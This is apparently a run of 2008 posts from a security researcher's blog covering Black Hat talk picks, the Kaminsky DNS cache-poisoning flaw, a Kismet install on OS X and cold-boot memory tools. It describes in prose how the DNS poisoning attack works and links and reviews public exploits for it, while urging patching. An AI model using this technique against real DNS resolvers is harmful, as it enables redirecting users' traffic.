Everybody else is posting their picks for the talks they want to attend at Blackhat USA 2008.  I’m not going, but Chris Gates, of the excellent carnal0wnage blog, and I have decided to post our picks as part of an armchair “Blackhat Fantasy League”.  This’ll serve as a nice reference for myself when audio/video of the conference is released too.

(Edit: Chris just posted his picks.  There’s a nice web security flavor to his choices)

It really is a shame that I won’t be able to go, since our good friend Yousif Yalda promised to “beat me down” there.  Assuming I could make it to each talk, between all the beatings, here’s where I’d like to be:

Day 1 - 10:00 - 11:00

Fyodor Vaskovich - Track: The Network

This is going to be outstanding.  I always enjoy hearing Fyodor talk about nmap internals and tricks used to get more speed out of it.

Day 1 - 11:15 - 12:30

Dan Kaminsky - DNS Goodness

Pretty obvious choice here.  I feel sorry for the other speakers on during this time slot.

Day 1 - 13:45 - 16:30

Lots of folks - Iron Chef Fuzzing Challenge

Jacob West, Charlie Miller, Geoff Morrison, Jacob Honoroff, Sean Fay, Brian Chess finding vulnerabilities, Iron Chef style.  The Cisco shellcode/backdoor talk almost beats this out, but I had a lot of fun listening to the last Iron Chef challenge.

Day 1 - 16:45 - 18:00

Val Smith, Colin Ames - MetaPost-Exploitation

I’m on a Metasploit kick right now :)

Day 1 - 18:00 -

The Pwnie Awards

Day 2 - 10:00 - 11:00

Felix Lindner - Developments in Cisco IOS Forensics

I haven’t gotten my hands dirty with the guts of IOS, so I think I would enjoy this.

Day 2 - 11:15 - 12:30

Eric Filiol - Passive and Active Leakage of Secret Data from Non-Networked Computer

The description on the Blackhat site is kind of vague, but it sounds fascinating

Day 2 - 13:45 - 16:30 (?)

Lukas Grunwald - Hacking and Injecting Federal Trojans

Law enforcement injecting trojans into software downloads… neat… (this one is scheduled back to back with itself, so I don’t know if it’s a continuation or what?)

Day 2 - 16:45 - 18:00

Patrick McGregor - Braving the Cold : New Methods for Preventing Cold Boot Attacks on Encryption Keys

Having written msramdmp, I definitely have an interest in talks on cold-boot memory attacks :)

…and I couldn’t be happier.  I’m going to start writing “weaponized code” instead of “exploits”.  This will totally make up for having to give up “reverse-engineering” for “deep analysis” for “legal reasons” ;).

However you feel about people publishing exploits for the DNS flaw already, there’s a selection of them out there now, and you might as well have a look at the code if you’re a penetration tester.  Now, I’m going to give out some links to these, so if you happen to be a blackhat that relies only on this site for your exploit needs, I’m going to have to ask you to go ahead and close your browser:

• I)ruid and H D Moore’s metasploit module (and in the context of the trunk version of metasploit) - This one’s pretty nice.  Like a good metasploit module, it has functionality built in to test a server for vulnerability.  It can’t spoof if there’s already a cached entry for the domain you’re trying to spoof, however it is smart enough to check for this ahead of time and sleep until it can try again.  This one also randomizes the domain names it’s using while it tries to guess the transaction ID.
• Julien Desfossez’s standalone exploit - Less frills than the metasploit modules, but it gets points for being written in python with the excellent Scapy .  From the code, it looks like the domain names it’s using while guessing the transaction ID are pretty predictable:  a3.victim.com, a4.victim.com, a5.victim.com, etc. etc. etc.

I’ll talk about other exploits when I see them, if I think they’re interesting.  I’m honestly surprised it’s taken as long as it has for exploits to come out, as it’s a pretty easy vulnerability to wrap your head around, and pretty straightfoward to generate the packets.

This’ll give you something to play with in the lab whilethe Internet crumbles around you.

Edit:

This about sums up my thoughts:

I guarantee that |)ruid/hdm’s exploit was not the first. Who would you prefer poisons your cache: discreet pros or kiddies with metasploit?

Thanks Dino.

The folks who put on the excellent Securabit podcast have decided to put together a quick and dirty episode-between-episodes on the recent DNS vulnerability.  They’ve decided to call these spontaneous episodes “Securabytes”, and this is the first one:

• Securabyte Episode 1: DNS Haiku

Since Dan Kaminsky doesn’t leap around the apartment to find his headset in order to podcast on a 10 minute notice at 10PM, I was grabbed off IRC to discuss the details of the vulnerability and its impact.  I had a blast recording this episode with Rob, Joel, and Martin McKeay (of the great Network Security podcast and blog).  Being able to bounce it off these guys really helped to convey not only the vulnerability itself, but what it means for admins, end users, and even penetration testers.

I hope you give it a listen, and subscribe to Securabit in your iTunes or RSS!

First, a post went up on Matasano and promptly disappeared, and now Kaminsky has posted on Doxpara:

Patch.  Today.  Now. Yes, stay late.  Yes, forward to OpenDNS if you have to.  (They’re ready for your traffic.)  Thank you to the many of you who already have.

From what I can tell, it’s out of the bag.  I haven’t done any testing to make sure, but what I’ve read makes sense.  If you’re not entirely sure about your DNS, set yourself up on OpenDNS now.

Edit: Ah to heck with it, looks like everyone knows where to find it now anyways.  Here ya go, on Halvar Flake’s blog.

Edit Edit: Actually that’s not quite right, I think, but Matasano was, and I think you can figure it out from there.

Edit Edit Edit: Well, seeing as you can find out from comments on a Slashdot post, and other blogs, here’s the juicy part of the Matasano post:

Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.

Patch patch patch (then play with it in your test environment).

I purchased my MacBook right after the release of the newer Santa Rosa chipset models in late 2007, and I have to say, it’s the best laptop I’ve ever owned.  I moved to doing most of my security-related work on it, from my Latitude C400, much quicker than I expected.  I’m very happy with it.

The other day, I wanted to get Kismet up and running on OS X, which I thought would be a pain, since the newer MacBooks use a Broadcom 4328 for wireless.  KisMac is an option, as well (with some nice additional features!), but I have a long history of using Kismet in Linux and wanted to be able to use and demo it as well.  I figured I might have to resort to using an external USB wireless adapter.

As it turns out, it’s really not that difficult at all, and supports the 4328 very well in OS X.  I took notes on the commands I used, since I expected more problems than I ran into.  I think you’ll find it to be pretty straightforward:

First of all, you’ll need to install the XCode tools from the OS X install discs, so that you have an environment to compile the code.  I decided to create a directory under “/opt/” for kismet to live in, in case I needed to compile some libraries especially for it (I expected to need a newer version of pcap, but this was not the case).  This part’s up to your taste.  You may not find it necessary:

mkdir /opt
mkdir /opt/kismet
mkdir /opt/kismet/src
cd /opt/kismet/src

Next, check out the latest development version of Kismet from the Kismet SVN:

svn co http://svn.kismetwireless.net/code/trunk kismet-devel

Now, switch to the directory with source, and run configure.  You’ll want to set the prefix if you set up a special place for Kismet to live, like I did:

cd kismet-devel
./configure --prefix=/opt/kismet/

Compile, and install:

make dep
make
sudo make install

The configuration’s pretty easy as well.  Edit the kismet.conf file (in this case, at “/opt/kismet/etc/kismet.conf”).  You’ll be making two simple changes.  Kismet wants to drop privileges to a user’s level, so look for this part of the config and change it:

suiduser=<your OS X username>

…and set up your capture source:

source=darwin,en1,airport

That’s it, really!  You can run it with “sudo /opt/kismet/bin/kismet” (might want to add it to your path).  It works very well too.  I’ve noticed that I can stay associated to an access point, while sniffing and hopping channels with Kismet.  This is better than what I could do with my old Intel 2200.

I went into the installation figuring I would make a blog post about getting it running.  I never expected it to be so easy, so this post might not even be needed!  Maybe it’ll at least let folks know ahead of time that there’s smooth sailing ;).

Today, Jacob Applebaum is giving a talk at The Last HOPE conference on the tools they have for dumping and retrieving keys from memory after a cold boot.  These are the tools that were demonstrated some months ago, and got everyone interested in the security of whole-disk encryption products.  There was a lot of interest in the memory dumping tool, so since the Princeton tool had not been released, I wrote msramdmp.

The Princeton tools are now available here.

The key-finding code is definitely of interest, and ought to work with msramdmp images as well (although I haven’t tested the code at all, yet).  From what I’m reading of the memory dumping code and docs, if msramdmp is currently suiting your needs, you may not need to change over, especially if you’re taking advantage of the fact that msramdmp will let you dump a few computers before having to pull the images off and reset the partitions.  If, however, you’re wanting to dump more than 4 gigs on a 64-bit machine, dump over a network, or dump an EFI-based machine, the Princeton tools are definitely what you’ll want to start playing with now.

Very cool work, Jacob!  Hope the talk goes well!

Whenever a new sure-fire blockbuster movie sequel comes out, there’s always the attempt to wring some more cash out of the previous entries.  There’ll be a DVD box set that runs about $10 a disc, with all the previous films in one nice looking collection.  These sell well, both to people new to a series wanting to catch up, as well as long-time fans.

Dan Kaminsky’s talk at this year’s Black Hat USA conference on August 6th where he drops the new DNS 0-day will undoubtedly be the sure-fire blockbuster talk of the conference.  Kaminsky has given excellent talks on various network security topics for years now, so in the spirit of a cash-in box set, I’ve spent a little time today collecting up links to previous talks he’s given.

Most of these are in his recurring theme of “TCP/IP Black Ops”, and I have learned a lot over the years, listening to these talks.  The recent ones were fairly easy to find on Google Video, however some of the older ones required digging around a bit (mostly on the EasyNews mirror).  I’ve embedded or linked video, where available.  Some talks I could only find in mp3 format.  Some of the older Defcon talks may be available in realmedia video format on the defcon site, but I really prefer to stick to non-realmedia formats.

If you need slides to go along with the audio-only talks, it looks like most of them are available on Kaminsky’s bio page.

As I said, I’ve learned a lot from these talks, and highly recommend them to anyone else interested in getting elbows-deep into network security.  Enjoy!

If you’re handy with Gimp and create box art for a Dan Kaminsky box set, leave a comment ;-)

Defcon 9 (2001): Gateway Cryptography: Hacking Impossible Tunnels Through Improbable Networks with OpenSSH

• MP3

Defcon 10 (2002): Black Ops of TCP/IP

• MP3 Part 1
• MP3 Part 2

Defcon 11 (2003): Stack Black Ops

• MP3

Blackhat 2004: Black Ops of DNS

• MP3

22C3: Black Ops Of TCP/IP 2005.5

Toorcon 2006 - Black Ops Of TCP-IP 2006

Shmoocon 2007 - Weaponizing Noam Chomsky (or Hacking with Pattern Languages)

• MP4 Video

Defcon 15 - Black Ops 2007: Design Reviewing The Web

I don’t normally pay much attention to banner ads, especially for diploma mills, but this one caught my eye:

I thought to myself, “That looks familiar.  It’s almost as if I have been there before…”

I have:

Swalm Hall, on the Mississippi State University campus.  This is about half of a mile away from where I work part time as a graduate researcher at the MSU Center for Computer Security Research while I finish up my Ph.D.  As an undergraduate, I had a technical writing class in Swalm, and attended entrepreneurialship lectures in the auditorium.  While it’s a relatively new building, built while I was an undergrad, it was designed as a replica of another, older building on campus, Lee Hall:

These two buildings face each other, on opposite sides of the drill field.  I had actually convinced myself that the University of Phoenix was using an image of Lee Hall, and was halfway through writing this blog post, when I went looking for an image of Swalm Hall to give the post some character.  In the process, I stumbled across the picture of Swalm above, which appears to be the exact image they used (or very close).

We can’t quite offer a 13-month degree here, but at least we don’t have to claim buildings from other campuses :).  If you’re ever in the area and want the grand tour, let me know.

• Original flash version of the ad
• Blog post where I found the pic of Swalm, and probably where the “artist” for the ad found it too

Regarding “Homer Simpson and the Kimya Botnet“, a new away message for Chunkylover53 (Homer Simpson’s AOL account, revealed in one of the episodes, and since hijacked) drops some names:

KRYOGENIKS EBK and DEFIANT RoXed HOMER sHouTz To VIRUS Warlock elul21 coll1er and Slacker.

I wouldn’t advise keeping him on your buddy list at this point, as the account is pushing out malware occasionally.

It’s a weekend, so I’m all for a fun post.

The sexyhacking.com videos are not safe for work, however they’re probably even less arousing than you’d think.  They are hosted on YouTube, after all.  You might want to have a look, though, since they’re funny (intentionally and unintentionally), and who knows how long they’ll actually be around.

In the second video, described as Episode 1 in a series called “Naughty Script K1dd13″, basic compilation and usage of nmap is covered by a somewhat disinterested teacher.  It must be hot in the classroom, since she’s unbuttoned her shirt about halfway down.  Strangely enough, while nmap is displaying its scan, they censor the IP addresses involved with COPS-style pixelization:

If you’re paying more attention to the terminal than the girl, you’ll notice that they’re not very thorough.  At 3:49, we catch the video editor asleep at the wheel as the traceroute pops up :

…and at 3:50, the censor wakes up :) :

I’m not even sure why they’re attempting to hide the IP address.  It’s stated in the narration that sexyhacking.com will be used as the target, and the IP address revealed above is simply what you’d get doing a DNS lookup of sexyhacking.com…

(so long as Dan Kaminsky isn’t angry at you)

So, to sum it up:  If you’re redacting information out of a video you’re publishing, you not only have to worry about people being able to reverse engineer your pixelation (just black it out!), you’ll also have to make sure you blot it out of every frame :) .